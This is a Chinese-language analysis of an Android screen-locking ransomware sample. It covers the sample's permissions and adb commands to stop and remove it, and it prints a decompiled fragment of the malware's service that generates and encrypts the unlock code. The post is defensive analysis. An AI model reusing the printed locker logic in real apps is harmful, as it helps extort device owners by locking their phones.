Android锁机样本分析

样本基本信息

样本包名：Android.qun.zhu.an.zhuo.kou.kou
MD5值： 36f2db49dcb62247055df771dca47bde
来源：52破解论坛某求助贴。

样本目录结构

敏感权限

• service android:name=“E”，注册服务
• android.permission.SYSTEM_ALERT_WINDOW，显示系统窗口，能全局弹出对话框
• android.permission.RECEIVE_BOOT_COMPLETED，允许程序开机自动运行

其获取的权限， 用于自启和弹窗。

分析

1、

先想办法关闭这个“锁屏”软件，为什么叫他锁屏。。，使用adb命令就可以关闭它，并且不会再自启23333，重启都不会自启了，只好再次命令开启它。

关闭 adb shell am force-stop Android.qun.zhu.an.zhuo.kou.kou
关闭 adb shell monkey -p Android.qun.zhu.an.zhuo.kou.kou -c android.intent.category.LAUNCHER
卸载 adb uninstall Android.qun.zhu.an.zhuo.kou.kou

2、

虽然弱到很无语，但是分析还是要继续。

前面提到创建了一个服务“E”：

E:

 public void onCreate() {
        LogCatBroadcaster.start(this);
        super.onCreate();
        this.w = (long) (Math.random() * ((double) 1000000000));
        this.y = new Long(((((((this.w + ((long) 7777777)) - ((long) 777777)) + ((long) 77777)) - ((long) 7777)) + ((long) 777)) - ((long) 77)) + ((long) 7));
        this.des = new B(".");			//类B是封装加密功能的类
        try {
            this.des = new B(this.des.decrypt("8b05493f08ae05e9"));
        } catch (Exception e) {
        }
        this.share = getSharedPreferences("Android", 0);			// 获取Android.xml文件，没有就创建，模式私有
        this.editor = this.share.edit();
        if (this.share.getLong("m", (long) null) == ((long) null)) {
            this.editor.putLong("m", this.w);			//将上面的随机数存入
            this.editor.commit();			//提交操作到文件当中
            try {
                this.editor.putString("Android", this.des.encrypt(new StringBuffer().append("").append(this.y).toString()));
                this.editor.commit();
            } catch (Exception e2) {
            }
            if (is(getApplicationContext())) {
                this.s = new StringBuffer().append(this.share.getLong("m", (long) 8)).append("").toString();			//给成员变量赋值
                try {
                    this.j = this.des.decrypt(this.share.getString("Android", ""));			//给成员变量赋值
                } catch (Exception e3) {
                }
                new Thread(this) {				//创建线程启动锁机页面
                    private final E this$0;

                    {
                        this.this$0 = r1;
                    }

                    static E access$0(AnonymousClass100000000 anonymousClass100000000) {
                        return anonymousClass100000000.this$0;
                    }

                    public void run() {
                    }
                }.start();	
                return;
            }
            try {
                this.editor.putLong("m", Long.parseLong(this.des.decrypt("94d4efa162d2a3c8")));
                this.editor.commit();
                this.editor.putString("Android", "1cf9ca82b0ba99998a8c59d750bf14336af6977ceaa70ba104ea2c8a2768d05a");
                this.editor.commit();
            } catch (Exception e4) {
            }
        }
    }

启动服务E：

总结

简单过头的锁屏软件